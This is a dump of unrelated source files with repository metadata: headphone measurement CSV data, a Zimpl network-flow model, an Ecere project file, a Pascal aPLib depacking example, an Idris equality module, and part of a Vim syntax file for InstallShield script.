12255.08,-2.37,0.58,-7.67,-2.63,2.63,2.36,1.35,0.26,-5.04,-2.95
12377.63,-2.38,0.76,-7.79,-2.58,2.58,2.30,1.31,0.20,-5.21,-3.14
12501.41,-2.42,0.92,-7.91,-2.53,2.53,2.23,1.28,0.12,-5.37,-3.34
12626.42,-2.50,1.04,-8.03,-2.48,2.48,2.17,1.25,-0.01,-5.54,-3.54
12752.68,-2.61,1.13,-8.14,-2.43,2.43,2.11,1.23,-0.17,-5.71,-3.74
12880.21,-2.76,1.15,-8.26,-2.38,2.38,2.04,1.21,-0.38,-5.88,-3.91
13009.01,-2.92,1.14,-8.38,-2.33,2.33,1.98,1.19,-0.59,-6.05,-4.06
13139.10,-3.12,1.05,-8.50,-2.28,2.28,1.92,1.18,-0.84,-6.22,-4.17
13270.49,-3.35,0.89,-8.62,-2.22,2.22,1.85,1.17,-1.13,-6.40,-4.24
13403.20,-3.61,0.64,-8.74,-2.16,2.16,1.79,1.17,-1.45,-6.57,-4.25
13537.23,-3.90,0.33,-8.85,-2.11,2.11,1.73,1.16,-1.79,-6.75,-4.23
13672.60,-4.24,-0.05,-8.97,-2.05,2.05,1.67,1.17,-2.19,-6.93,-4.19
13809.33,-4.63,-0.49,-9.09,-1.99,1.99,1.61,1.17,-2.64,-7.11,-4.14
13947.42,-5.07,-0.98,-9.21,-1.92,1.92,1.55,1.19,-3.14,-7.29,-4.09
14086.90,-5.56,-1.52,-9.33,-1.86,1.86,1.49,1.20,-3.70,-7.47,-4.04
14227.77,-6.08,-2.09,-9.45,-1.80,1.80,1.43,1.22,-4.28,-7.65,-3.99
14370.04,-6.63,-2.64,-9.57,-1.73,1.73,1.37,1.25,-4.90,-7.84,-3.99
14513.74,-7.20,-3.16,-9.69,-1.67,1.67,1.31,1.28,-5.53,-8.03,-4.04
14658.88,-7.79,-3.64,-9.81,-1.60,1.60,1.26,1.31,-6.19,-8.21,-4.15
14805.47,-8.38,-4.05,-9.93,-1.53,1.53,1.20,1.35,-6.85,-8.40,-4.33
14953.52,-8.97,-4.38,-10.05,-1.46,1.46,1.15,1.38,-7.51,-8.59,-4.59
15103.06,-9.54,-4.59,-10.17,-1.39,1.39,1.09,1.42,-8.15,-8.79,-4.95
15254.09,-10.10,-4.71,-10.30,-1.32,1.32,1.04,1.46,-8.78,-8.98,-5.39
15406.63,-10.64,-4.74,-10.42,-1.24,1.24,0.99,1.50,-9.40,-9.17,-5.90
15560.70,-11.14,-4.68,-10.54,-1.17,1.17,0.94,1.53,-9.97,-9.37,-6.46
15716.30,-11.58,-4.54,-10.66,-1.09,1.09,0.89,1.55,-10.49,-9.57,-7.04
15873.47,-11.97,-4.33,-10.78,-1.01,1.01,0.84,1.55,-10.95,-9.77,-7.64
16032.20,-12.32,-4.05,-10.90,-0.94,0.94,0.80,1.54,-11.38,-9.97,-8.27
16192.52,-12.62,-3.66,-11.03,-0.86,0.86,0.75,1.51,-11.76,-10.17,-8.96
16354.45,-12.87,-3.26,-11.15,-0.77,0.77,0.71,1.47,-12.09,-10.37,-9.61
16517.99,-13.11,-2.90,-11.27,-0.69,0.69,0.66,1.40,-12.42,-10.58,-10.21
16683.17,-13.32,-2.57,-11.39,-0.61,0.61,0.62,1.32,-12.71,-10.78,-10.75
16850.01,-13.51,-2.28,-11.52,-0.52,0.52,0.58,1.23,-12.98,-10.99,-11.23
17018.51,-13.69,-2.02,-11.64,-0.44,0.44,0.54,1.13,-13.25,-11.20,-11.67
17188.69,-13.85,-1.63,-11.76,-0.35,0.35,0.50,1.02,-13.50,-11.41,-12.22
17360.58,-13.98,-1.29,-11.89,-0.26,0.26,0.47,0.92,-13.72,-11.62,-12.69
17534.18,-14.10,-0.98,-12.01,-0.17,0.17,0.43,0.82,-13.93,-11.84,-13.12
17709.53,-14.20,-0.71,-12.13,-0.08,0.08,0.39,0.73,-14.12,-12.05,-13.49
17886.62,-14.30,-0.48,-12.26,0.01,-0.01,0.36,0.64,-14.31,-12.27,-13.82
18065.49,-14.41,-0.15,-12.38,0.10,-0.10,0.33,0.56,-14.51,-12.48,-14.26
18246.14,-14.56,0.28,-12.51,0.20,-0.20,0.30,0.49,-14.76,-12.70,-14.84
18428.60,-14.73,0.65,-12.63,0.29,-0.29,0.27,0.42,-15.02,-12.92,-15.38
18612.89,-14.91,0.99,-12.75,0.39,-0.39,0.24,0.36,-15.30,-13.14,-15.90
18799.02,-15.10,1.27,-12.88,0.49,-0.49,0.22,0.31,-15.59,-13.37,-16.37
18987.01,-15.30,1.50,-13.00,0.59,-0.59,0.19,0.27,-15.89,-13.59,-16.80
19176.88,-15.50,2.00,-13.13,0.69,-0.69,0.17,0.23,-16.19,-13.82,-17.50
19368.65,-15.71,2.49,-13.26,0.79,-0.79,0.15,0.19,-16.50,-14.04,-18.20
19562.33,-15.93,2.92,-13.38,0.89,-0.89,0.13,0.16,-16.82,-14.27,-18.85
19757.96,-16.16,3.31,-13.51,1.00,-1.00,0.11,0.13,-17.16,-14.50,-19.47
19955.54,-16.40,3.66,-13.63,1.10,-1.10,0.09,0.10,-17.50,-14.73,-20.06
| CSV | 2 | vinzmc/AutoEq | results/referenceaudioanalyzer/referenceaudioanalyzer_hdm-x_harman_over-ear_2018/Sennheiser HD 380 Pro/Sennheiser HD 380 Pro.csv | [
"MIT"
] |
# Parameters
param N := read "network.csv" as "1n" use 1 comment "#";
set Ns := {0..N-1};
set N0 := {1..N-1};
param L := read "network.csv" as "2n" use 1 comment "#";
set Ls := {1..L};
param fromBus[Ls] := read "network.csv" as "<1n> 2n" skip 1 use L comment "#";
param toBus[Ls] := read "network.csv" as "<1n> 3n" skip 1 use L comment "#";
param C[Ls] := read "network.csv" as "<1n> 6n" skip 1 use L comment "#";
param p[Ns] := read "baselines.dat" as "<1n> 2n" skip 1 use N comment "#";
param dP[Ns] := read "qualified-flex.csv" as "<1n> 2n" skip 1 use N comment "#";
param dM[Ns] := read "qualified-flex.csv" as "<1n> 3n" skip 1 use N comment "#";
# Variables
var f[<line> in Ls] >= -C[line] <= C[line];
var rU[Ns] >= 0;
var rL[Ns] >= 0;
# Objective
minimize flexRequirement:
sum <n> in Ns : (dP[n]*rU[n] + dM[n]*rL[n]);
# Constraints
subto BalanceNode:
forall <n> in Ns :
p[n] + rU[n] - rL[n]
- sum <line> in Ls : if (fromBus[line] == n) then f[line] else 0*f[line] end
+ sum <line> in Ls : if (toBus[line] == n) then f[line] else 0*f[line] end
== 0;
| Zimpl | 4 | sebMathieu/dsima | simulator/models/DSO-flexNeeds.zpl | [
"BSD-3-Clause"
] |
Begin Project "ProjectSample", "", VC_PROJECT=, AUXPROJPATH=
DATASOURCE=
DATABASE=
Begin File "emp.sql"
PATH=.\emp.sql
DESCRIPTION=
INCLUDE=1
BUILDINDEX=-1
OBJECTTYPE=-1
End File
Begin File "EMPDEPT_Sample.sql"
PATH=.\EMPDEPT_Sample.sql
DESCRIPTION=
INCLUDE=1
BUILDINDEX=-1
OBJECTTYPE=-1
End File
Begin File "GetDBInfo.sql"
PATH=.\GetDBInfo.sql
DESCRIPTION=
INCLUDE=1
BUILDINDEX=-1
OBJECTTYPE=-1
End File
Begin File "OracleLoopingScript.sql"
PATH=.\OracleLoopingScript.sql
DESCRIPTION=
INCLUDE=1
BUILDINDEX=-1
OBJECTTYPE=-1
End File
Begin File "tax.sql"
PATH=.\tax.sql
DESCRIPTION=
INCLUDE=1
BUILDINDEX=-1
OBJECTTYPE=-1
End File
End Project
| Ecere Projects | 2 | anilws1/DBPS | Sample/ProjectSample.epj | [
"Apache-2.0"
] |
program test__aplib_depack;
(*
* aPLib compression library - the smaller the better :)
*
* VPascal depacking example
*
* Copyright (c) 1998-2009 by Joergen Ibsen / Jibz
* All Rights Reserved
*
* http://www.ibsensoftware.com/
*
* -> VPascal by Veit Kannegieser, 23.09.1998
*)
{$IfDef DYNAMIC_VERSION}
uses aplibud;
{$Else}
uses aplibu;
{$EndIf}
var
infile ,outfile :file;
inbuffer ,outbuffer :pointer;
insize ,outsize :longint;
outmemsize :longint;
begin
(* check number of parameters *)
if ParamCount<1 then
begin
WriteLn;
WriteLn('Syntax: APUNPACK <input file> [output file]');
WriteLn;
Halt(1);
end;
(* open input file and read header *)
Assign(infile,ParamStr(1));
FileMode:=$40; (* open_access_ReadOnly OR open_share_DenyNone *)
Reset(infile,1);
insize:=FileSize(infile);
(* get mem and read input file *)
GetMem(inbuffer,insize);
BlockRead(infile,inbuffer^,insize);
Close(infile);
(* get original size from header and get mem *)
outmemsize := _aPsafe_get_orig_size(inbuffer^);
GetMem(outbuffer,outmemsize);
(* unpack data *)
outsize:=_aPsafe_depack(inbuffer^,insize,outbuffer^,outmemsize);
if outsize=aPLib_Error then
begin
WriteLn;
WriteLn('ERR: compressed data error');
WriteLn;
Halt(1);
end;
if outsize<>outmemsize then Halt(1);
(* write unpacked data *)
if ParamCount<2 then
begin
Assign(outfile,'out.dat');
WriteLn;
WriteLn('No output file specified, writing to ''out.dat''');
end
else
Assign(outfile,ParamStr(2));
FileModeReadWrite:=$42; (* open_access_ReadWrite OR open_share_DenyNone *)
Rewrite(outfile,1);
BlockWrite(outfile,outbuffer^,outsize);
Close(outfile);
(* free mem *)
Dispose(inbuffer);
Dispose(outbuffer);
end.
| Pascal | 4 | nehalem501/gendev | tools/files/applib/contrib/vpascal/apunpack.pas | [
"BSD-3-Clause"
] |
CREATE DATABASE `EE1420`;
| SQL | 1 | suryatmodulus/tidb | br/tests/lightning_tool_1420/data/EE1420-schema-create.sql | [
"Apache-2.0",
"BSD-3-Clause"
] |
module Decidable.Equality.Core
%default total
--------------------------------------------------------------------------------
-- Decidable equality
--------------------------------------------------------------------------------
||| Decision procedures for propositional equality
public export
interface DecEq t where
||| Decide whether two elements of `t` are propositionally equal
decEq : (x1 : t) -> (x2 : t) -> Dec (x1 = x2)
--------------------------------------------------------------------------------
-- Utility lemmas
--------------------------------------------------------------------------------
||| The negation of equality is symmetric (follows from symmetry of equality)
export
negEqSym : Not (a = b) -> Not (b = a)
negEqSym p h = p (sym h)
||| Everything is decidably equal to itself
export
decEqSelfIsYes : DecEq a => {x : a} -> decEq x x = Yes Refl
decEqSelfIsYes with (decEq x x)
decEqSelfIsYes | Yes Refl = Refl
decEqSelfIsYes | No contra = absurd $ contra Refl
||| If you have a proof of inequality, you're sure that `decEq` would give a `No`.
export
decEqContraIsNo : DecEq a => {x, y : a} -> Not (x = y) -> (p ** decEq x y = No p)
decEqContraIsNo uxy with (decEq x y)
decEqContraIsNo uxy | Yes xy = absurd $ uxy xy
decEqContraIsNo _ | No uxy = (uxy ** Refl)
| Idris | 5 | ska80/idris-jvm | libs/base/Decidable/Equality/Core.idr | [
"BSD-3-Clause"
] |
" Vim syntax file
" Language: InstallShield Script
" Maintainer: Robert M. Cortopassi <cortopar@mindspring.com>
" Last Change: 2001 May 09
" quit when a syntax file was already loaded
if exists("b:current_syntax")
finish
endif
syn keyword ishdStatement abort begin case default downto else end
syn keyword ishdStatement endif endfor endwhile endswitch endprogram exit elseif
syn keyword ishdStatement error for function goto if
syn keyword ishdStatement program prototype return repeat string step switch
syn keyword ishdStatement struct then to typedef until while
syn keyword ishdType BOOL BYREF CHAR GDI HWND INT KERNEL LIST LONG
syn keyword ishdType NUMBER POINTER SHORT STRING USER
syn keyword ishdConstant _MAX_LENGTH _MAX_STRING
syn keyword ishdConstant AFTER ALLCONTENTS ALLCONTROLS APPEND ASKDESTPATH
syn keyword ishdConstant ASKOPTIONS ASKPATH ASKTEXT BATCH_INSTALL BACK
syn keyword ishdConstant BACKBUTTON BACKGROUND BACKGROUNDCAPTION BADPATH
syn keyword ishdConstant BADTAGFILE BASEMEMORY BEFORE BILLBOARD BINARY
syn keyword ishdConstant BITMAP256COLORS BITMAPFADE BITMAPICON BK_BLUE BK_GREEN
syn keyword ishdConstant BK_MAGENTA BK_MAGENTA1 BK_ORANGE BK_PINK BK_RED
syn keyword ishdConstant BK_SMOOTH BK_SOLIDBLACK BK_SOLIDBLUE BK_SOLIDGREEN
syn keyword ishdConstant BK_SOLIDMAGENTA BK_SOLIDORANGE BK_SOLIDPINK BK_SOLIDRED
syn keyword ishdConstant BK_SOLIDWHITE BK_SOLIDYELLOW BK_YELLOW BLACK BLUE
syn keyword ishdConstant BOOTUPDRIVE BUTTON_CHECKED BUTTON_ENTER BUTTON_UNCHECKED
syn keyword ishdConstant BUTTON_UNKNOWN CMDLINE COMMONFILES CANCEL CANCELBUTTON
syn keyword ishdConstant CC_ERR_FILEFORMATERROR CC_ERR_FILEREADERROR
syn keyword ishdConstant CC_ERR_NOCOMPONENTLIST CC_ERR_OUTOFMEMORY CDROM
syn keyword ishdConstant CDROM_DRIVE CENTERED CHANGEDIR CHECKBOX CHECKBOX95
syn keyword ishdConstant CHECKLINE CHECKMARK CMD_CLOSE CMD_MAXIMIZE CMD_MINIMIZE
syn keyword ishdConstant CMD_PUSHDOWN CMD_RESTORE COLORMODE256 COLORS
syn keyword ishdConstant COMBOBOX_ENTER COMBOBOX_SELECT COMMAND COMMANDEX
syn keyword ishdConstant COMMON COMP_DONE COMP_ERR_CREATEDIR
syn keyword ishdConstant COMP_ERR_DESTCONFLICT COMP_ERR_FILENOTINLIB
syn keyword ishdConstant COMP_ERR_FILESIZE COMP_ERR_FILETOOLARGE
syn keyword ishdConstant COMP_ERR_HEADER COMP_ERR_INCOMPATIBLE
syn keyword ishdConstant COMP_ERR_INTPUTNOTCOMPRESSED COMP_ERR_INVALIDLIST
syn keyword ishdConstant COMP_ERR_LAUNCHSERVER COMP_ERR_MEMORY
syn keyword ishdConstant COMP_ERR_NODISKSPACE COMP_ERR_OPENINPUT
syn keyword ishdConstant COMP_ERR_OPENOUTPUT COMP_ERR_OPTIONS
syn keyword ishdConstant COMP_ERR_OUTPUTNOTCOMPRESSED COMP_ERR_SPLIT
syn keyword ishdConstant COMP_ERR_TARGET COMP_ERR_TARGETREADONLY COMP_ERR_WRITE
syn keyword ishdConstant COMP_INFO_ATTRIBUTE COMP_INFO_COMPSIZE COMP_INFO_DATE
syn keyword ishdConstant COMP_INFO_INVALIDATEPASSWORD COMP_INFO_ORIGSIZE
syn keyword ishdConstant COMP_INFO_SETPASSWORD COMP_INFO_TIME
syn keyword ishdConstant COMP_INFO_VERSIONLS COMP_INFO_VERSIONMS COMP_NORMAL
syn keyword ishdConstant COMP_UPDATE_DATE COMP_UPDATE_DATE_NEWER
syn keyword ishdConstant COMP_UPDATE_SAME COMP_UPDATE_VERSION COMPACT
syn keyword ishdConstant COMPARE_DATE COMPARE_SIZE COMPARE_VERSION
syn keyword ishdConstant COMPONENT_FIELD_CDROM_FOLDER
syn keyword ishdConstant COMPONENT_FIELD_DESCRIPTION COMPONENT_FIELD_DESTINATION
syn keyword ishdConstant COMPONENT_FIELD_DISPLAYNAME COMPONENT_FIELD_FILENEED
syn keyword ishdConstant COMPONENT_FIELD_FTPLOCATION
syn keyword ishdConstant COMPONENT_FIELD_HTTPLOCATION COMPONENT_FIELD_MISC
syn keyword ishdConstant COMPONENT_FIELD_OVERWRITE COMPONENT_FIELD_PASSWORD
syn keyword ishdConstant COMPONENT_FIELD_SELECTED COMPONENT_FIELD_SIZE
syn keyword ishdConstant COMPONENT_FIELD_STATUS COMPONENT_FIELD_VISIBLE
syn keyword ishdConstant COMPONENT_FILEINFO_COMPRESSED
syn keyword ishdConstant COMPONENT_FILEINFO_COMPRESSENGINE
syn keyword ishdConstant COMPONENT_FILEINFO_LANGUAGECOMPONENT_FILEINFO_OS
syn keyword ishdConstant COMPONENT_FILEINFO_POTENTIALLYLOCKED
syn keyword ishdConstant COMPONENT_FILEINFO_SELFREGISTERING
syn keyword ishdConstant COMPONENT_FILEINFO_SHARED COMPONENT_INFO_ATTRIBUTE
syn keyword ishdConstant COMPONENT_INFO_COMPSIZE COMPONENT_INFO_DATE
syn keyword ishdConstant COMPONENT_INFO_DATE_EX_EX COMPONENT_INFO_LANGUAGE
syn keyword ishdConstant COMPONENT_INFO_ORIGSIZE COMPONENT_INFO_OS
syn keyword ishdConstant COMPONENT_INFO_TIME COMPONENT_INFO_VERSIONLS
syn keyword ishdConstant COMPONENT_INFO_VERSIONMS COMPONENT_INFO_VERSIONSTR
syn keyword ishdConstant COMPONENT_VALUE_ALWAYSOVERWRITE
syn keyword ishdConstant COMPONENT_VALUE_CRITICAL
syn keyword ishdConstant COMPONENT_VALUE_HIGHLYRECOMMENDED
syn keyword ishdConstant COMPONENT_FILEINFO_LANGUAGE COMPONENT_FILEINFO_OS
syn keyword ishdConstant COMPONENT_VALUE_NEVEROVERWRITE
syn keyword ishdConstant COMPONENT_VALUE_NEWERDATE COMPONENT_VALUE_NEWERVERSION
syn keyword ishdConstant COMPONENT_VALUE_OLDERDATE COMPONENT_VALUE_OLDERVERSION
syn keyword ishdConstant COMPONENT_VALUE_SAMEORNEWDATE
syn keyword ishdConstant COMPONENT_VALUE_SAMEORNEWERVERSION
syn keyword ishdConstant COMPONENT_VALUE_STANDARD COMPONENT_VIEW_CHANGE
syn keyword ishdConstant COMPONENT_INFO_DATE_EX COMPONENT_VIEW_CHILDVIEW
syn keyword ishdConstant COMPONENT_VIEW_COMPONENT COMPONENT_VIEW_DESCRIPTION
syn keyword ishdConstant COMPONENT_VIEW_MEDIA COMPONENT_VIEW_PARENTVIEW
syn keyword ishdConstant COMPONENT_VIEW_SIZEAVAIL COMPONENT_VIEW_SIZETOTAL
syn keyword ishdConstant COMPONENT_VIEW_TARGETLOCATION COMPRESSHIGH COMPRESSLOW
syn keyword ishdConstant COMPRESSMED COMPRESSNONE CONTIGUOUS CONTINUE
syn keyword ishdConstant COPY_ERR_CREATEDIR COPY_ERR_NODISKSPACE
syn keyword ishdConstant COPY_ERR_OPENINPUT COPY_ERR_OPENOUTPUT
syn keyword ishdConstant COPY_ERR_TARGETREADONLY COPY_ERR_MEMORY
syn keyword ishdConstant CORECOMPONENTHANDLING CPU CUSTOM DATA_COMPONENT
syn keyword ishdConstant DATA_LIST DATA_NUMBER DATA_STRING DATE DEFAULT
syn keyword ishdConstant DEFWINDOWMODE DELETE_EOF DIALOG DIALOGCACHE
syn keyword ishdConstant DIALOGTHINFONT DIR_WRITEABLE DIRECTORY DISABLE DISK
syn keyword ishdConstant DISK_FREESPACE DISK_TOTALSPACE DISKID DLG_ASK_OPTIONS
syn keyword ishdConstant DLG_ASK_PATH DLG_ASK_TEXT DLG_ASK_YESNO DLG_CANCEL
syn keyword ishdConstant DLG_CDIR DLG_CDIR_MSG DLG_CENTERED DLG_CLOSE
syn keyword ishdConstant DLG_DIR_DIRECTORY DLG_DIR_FILE DLG_ENTER_DISK DLG_ERR
syn keyword ishdConstant DLG_ERR_ALREADY_EXISTS DLG_ERR_ENDDLG DLG_INFO_ALTIMAGE
syn keyword ishdConstant DLG_INFO_CHECKMETHOD DLG_INFO_CHECKSELECTION
syn keyword ishdConstant DLG_INFO_ENABLEIMAGE DLG_INFO_KUNITS
syn keyword ishdConstant DLG_INFO_USEDECIMAL DLG_INIT DLG_MSG_ALL
syn keyword ishdConstant DLG_MSG_INFORMATION DLG_MSG_NOT_HAND DLG_MSG_SEVERE
syn keyword ishdConstant DLG_MSG_STANDARD DLG_MSG_WARNING DLG_OK DLG_STATUS
syn keyword ishdConstant DLG_USER_CAPTION DRIVE DRIVEOPEN DLG_DIR_DRIVE
syn keyword ishdConstant EDITBOX_CHANGE EFF_BOXSTRIPE EFF_FADE EFF_HORZREVEAL
syn keyword ishdConstant EFF_HORZSTRIPE EFF_NONE EFF_REVEAL EFF_VERTSTRIPE
syn keyword ishdConstant ENABLE END_OF_FILE END_OF_LIST ENHANCED ENTERDISK
syn keyword ishdConstant ENTERDISK_ERRMSG ENTERDISKBEEP ENVSPACE EQUALS
syn keyword ishdConstant ERR_BADPATH ERR_BADTAGFILE ERR_BOX_BADPATH
syn keyword ishdConstant ERR_BOX_BADTAGFILE ERR_BOX_DISKID ERR_BOX_DRIVEOPEN
syn keyword ishdConstant ERR_BOX_EXIT ERR_BOX_HELP ERR_BOX_NOSPACE ERR_BOX_PAUSE
syn keyword ishdConstant ERR_BOX_READONLY ERR_DISKID ERR_DRIVEOPEN
syn keyword ishdConstant EXCLUDE_SUBDIR EXCLUSIVE EXISTS EXIT EXTENDEDMEMORY
syn keyword ishdConstant EXTENSION_ONLY ERRORFILENAME FADE_IN FADE_OUT
syn keyword ishdConstant FAILIFEXISTS FALSE FDRIVE_NUM FEEDBACK FEEDBACK_FULL
syn keyword ishdConstant FEEDBACK_OPERATION FEEDBACK_SPACE FILE_ATTR_ARCHIVED
syn keyword ishdConstant FILE_ATTR_DIRECTORY FILE_ATTR_HIDDEN FILE_ATTR_NORMAL
syn keyword ishdConstant FILE_ATTR_READONLY FILE_ATTR_SYSTEM FILE_ATTRIBUTE
syn keyword ishdConstant FILE_BIN_CUR FILE_BIN_END FILE_BIN_START FILE_DATE
syn keyword ishdConstant FILE_EXISTS FILE_INSTALLED FILE_INVALID FILE_IS_LOCKED
syn keyword ishdConstant FILE_LINE_LENGTH FILE_LOCKED FILE_MODE_APPEND
syn keyword ishdConstant FILE_MODE_BINARY FILE_MODE_BINARYREADONLY
syn keyword ishdConstant FILE_MODE_NORMAL FILE_NO_VERSION FILE_NOT_FOUND
syn keyword ishdConstant FILE_RD_ONLY FILE_SIZE FILE_SRC_EQUAL FILE_SRC_OLD
syn keyword ishdConstant FILE_TIME FILE_WRITEABLE FILENAME FILENAME_ONLY
syn keyword ishdConstant FINISHBUTTON FIXED_DRIVE FONT_TITLE FREEENVSPACE
syn keyword ishdConstant FS_CREATEDIR FS_DISKONEREQUIRED FS_DONE FS_FILENOTINLIB
syn keyword ishdConstant FS_GENERROR FS_INCORRECTDISK FS_LAUNCHPROCESS
syn keyword ishdConstant FS_OPERROR FS_OUTOFSPACE FS_PACKAGING FS_RESETREQUIRED
syn keyword ishdConstant FS_TARGETREADONLY FS_TONEXTDISK FULL FULLSCREEN
syn keyword ishdConstant FULLSCREENSIZE FULLWINDOWMODE FOLDER_DESKTOP
syn keyword ishdConstant FOLDER_PROGRAMS FOLDER_STARTMENU FOLDER_STARTUP
syn keyword ishdConstant GREATER_THAN GREEN HELP HKEY_CLASSES_ROOT
syn keyword ishdConstant HKEY_CURRENT_CONFIG HKEY_CURRENT_USER HKEY_DYN_DATA
syn keyword ishdConstant HKEY_LOCAL_MACHINE HKEY_PERFORMANCE_DATA HKEY_USERS
syn keyword ishdConstant HOURGLASS HWND_DESKTOP HWND_INSTALL IGNORE_READONLY
syn keyword ishdConstant INCLUDE_SUBDIR INDVFILESTATUS INFO INFO_DESCRIPTION
syn keyword ishdConstant INFO_IMAGE INFO_MISC INFO_SIZE INFO_SUBCOMPONENT
syn keyword ishdConstant INFO_VISIBLE INFORMATION INVALID_LIST IS_186 IS_286
syn keyword ishdConstant IS_386 IS_486 IS_8514A IS_86 IS_ALPHA IS_CDROM IS_CGA
syn keyword ishdConstant IS_DOS IS_EGA IS_FIXED IS_FOLDER IS_ITEM ISLANG_ALL
syn keyword ishdConstant ISLANG_ARABIC ISLANG_ARABIC_SAUDIARABIA
syn keyword ishdConstant ISLANG_ARABIC_IRAQ ISLANG_ARABIC_EGYPT
syn keyword ishdConstant ISLANG_ARABIC_LIBYA ISLANG_ARABIC_ALGERIA
syn keyword ishdConstant ISLANG_ARABIC_MOROCCO ISLANG_ARABIC_TUNISIA
syn keyword ishdConstant ISLANG_ARABIC_OMAN ISLANG_ARABIC_YEMEN
syn keyword ishdConstant ISLANG_ARABIC_SYRIA ISLANG_ARABIC_JORDAN
syn keyword ishdConstant ISLANG_ARABIC_LEBANON ISLANG_ARABIC_KUWAIT
syn keyword ishdConstant ISLANG_ARABIC_UAE ISLANG_ARABIC_BAHRAIN
syn keyword ishdConstant ISLANG_ARABIC_QATAR ISLANG_AFRIKAANS
syn keyword ishdConstant ISLANG_AFRIKAANS_STANDARD ISLANG_ALBANIAN
syn keyword ishdConstant ISLANG_ENGLISH_TRINIDAD ISLANG_ALBANIAN_STANDARD
syn keyword ishdConstant ISLANG_BASQUE ISLANG_BASQUE_STANDARD ISLANG_BULGARIAN
syn keyword ishdConstant ISLANG_BULGARIAN_STANDARD ISLANG_BELARUSIAN
syn keyword ishdConstant ISLANG_BELARUSIAN_STANDARD ISLANG_CATALAN
syn keyword ishdConstant ISLANG_CATALAN_STANDARD ISLANG_CHINESE
syn keyword ishdConstant ISLANG_CHINESE_TAIWAN ISLANG_CHINESE_PRC
syn keyword ishdConstant ISLANG_SPANISH_PUERTORICO ISLANG_CHINESE_HONGKONG
syn keyword ishdConstant ISLANG_CHINESE_SINGAPORE ISLANG_CROATIAN
syn keyword ishdConstant ISLANG_CROATIAN_STANDARD ISLANG_CZECH
syn keyword ishdConstant ISLANG_CZECH_STANDARD ISLANG_DANISH
syn keyword ishdConstant ISLANG_DANISH_STANDARD ISLANG_DUTCH
syn keyword ishdConstant ISLANG_DUTCH_STANDARD ISLANG_DUTCH_BELGIAN
syn keyword ishdConstant ISLANG_ENGLISH ISLANG_ENGLISH_BELIZE
syn keyword ishdConstant ISLANG_ENGLISH_UNITEDSTATES
syn keyword ishdConstant ISLANG_ENGLISH_UNITEDKINGDOM ISLANG_ENGLISH_AUSTRALIAN
syn keyword ishdConstant ISLANG_ENGLISH_CANADIAN ISLANG_ENGLISH_NEWZEALAND
syn keyword ishdConstant ISLANG_ENGLISH_IRELAND ISLANG_ENGLISH_SOUTHAFRICA
syn keyword ishdConstant ISLANG_ENGLISH_JAMAICA ISLANG_ENGLISH_CARIBBEAN
syn keyword ishdConstant ISLANG_ESTONIAN ISLANG_ESTONIAN_STANDARD
syn keyword ishdConstant ISLANG_FAEROESE ISLANG_FAEROESE_STANDARD ISLANG_FARSI
syn keyword ishdConstant ISLANG_FINNISH ISLANG_FINNISH_STANDARD ISLANG_FRENCH
syn keyword ishdConstant ISLANG_FRENCH_STANDARD ISLANG_FRENCH_BELGIAN
syn keyword ishdConstant ISLANG_FRENCH_CANADIAN ISLANG_FRENCH_SWISS
syn keyword ishdConstant ISLANG_FRENCH_LUXEMBOURG ISLANG_FARSI_STANDARD
syn keyword ishdConstant ISLANG_GERMAN ISLANG_GERMAN_STANDARD
syn keyword ishdConstant ISLANG_GERMAN_SWISS ISLANG_GERMAN_AUSTRIAN
syn keyword ishdConstant ISLANG_GERMAN_LUXEMBOURG ISLANG_GERMAN_LIECHTENSTEIN
syn keyword ishdConstant ISLANG_GREEK ISLANG_GREEK_STANDARD ISLANG_HEBREW
syn keyword ishdConstant ISLANG_HEBREW_STANDARD ISLANG_HUNGARIAN
syn keyword ishdConstant ISLANG_HUNGARIAN_STANDARD ISLANG_ICELANDIC
syn keyword ishdConstant ISLANG_ICELANDIC_STANDARD ISLANG_INDONESIAN
syn keyword ishdConstant ISLANG_INDONESIAN_STANDARD ISLANG_ITALIAN
syn keyword ishdConstant ISLANG_ITALIAN_STANDARD ISLANG_ITALIAN_SWISS
syn keyword ishdConstant ISLANG_JAPANESE ISLANG_JAPANESE_STANDARD ISLANG_KOREAN
syn keyword ishdConstant ISLANG_KOREAN_STANDARD ISLANG_KOREAN_JOHAB
syn keyword ishdConstant ISLANG_LATVIAN ISLANG_LATVIAN_STANDARD
syn keyword ishdConstant ISLANG_LITHUANIAN ISLANG_LITHUANIAN_STANDARD
syn keyword ishdConstant ISLANG_NORWEGIAN ISLANG_NORWEGIAN_BOKMAL
syn keyword ishdConstant ISLANG_NORWEGIAN_NYNORSK ISLANG_POLISH
syn keyword ishdConstant ISLANG_POLISH_STANDARD ISLANG_PORTUGUESE
syn keyword ishdConstant ISLANG_PORTUGUESE_BRAZILIAN ISLANG_PORTUGUESE_STANDARD
syn keyword ishdConstant ISLANG_ROMANIAN ISLANG_ROMANIAN_STANDARD ISLANG_RUSSIAN
syn keyword ishdConstant ISLANG_RUSSIAN_STANDARD ISLANG_SLOVAK
syn keyword ishdConstant ISLANG_SLOVAK_STANDARD ISLANG_SLOVENIAN
syn keyword ishdConstant ISLANG_SLOVENIAN_STANDARD ISLANG_SERBIAN
syn keyword ishdConstant ISLANG_SERBIAN_LATIN ISLANG_SERBIAN_CYRILLIC
syn keyword ishdConstant ISLANG_SPANISH ISLANG_SPANISH_ARGENTINA
syn keyword ishdConstant ISLANG_SPANISH_BOLIVIA ISLANG_SPANISH_CHILE
syn keyword ishdConstant ISLANG_SPANISH_COLOMBIA ISLANG_SPANISH_COSTARICA
syn keyword ishdConstant ISLANG_SPANISH_DOMINICANREPUBLIC ISLANG_SPANISH_ECUADOR
syn keyword ishdConstant ISLANG_SPANISH_ELSALVADOR ISLANG_SPANISH_GUATEMALA
syn keyword ishdConstant ISLANG_SPANISH_HONDURAS ISLANG_SPANISH_MEXICAN
syn keyword ishdConstant ISLANG_THAI_STANDARD ISLANG_SPANISH_MODERNSORT
syn keyword ishdConstant ISLANG_SPANISH_NICARAGUA ISLANG_SPANISH_PANAMA
syn keyword ishdConstant ISLANG_SPANISH_PARAGUAY ISLANG_SPANISH_PERU
syn keyword ishdConstant IISLANG_SPANISH_PUERTORICO
syn keyword ishdConstant ISLANG_SPANISH_TRADITIONALSORT ISLANG_SPANISH_VENEZUELA
syn keyword ishdConstant ISLANG_SPANISH_URUGUAY ISLANG_SWEDISH
syn keyword ishdConstant ISLANG_SWEDISH_FINLAND ISLANG_SWEDISH_STANDARD
syn keyword ishdConstant ISLANG_THAI ISLANG_THA_STANDARDI ISLANG_TURKISH
syn keyword ishdConstant ISLANG_TURKISH_STANDARD ISLANG_UKRAINIAN
syn keyword ishdConstant ISLANG_UKRAINIAN_STANDARD ISLANG_VIETNAMESE
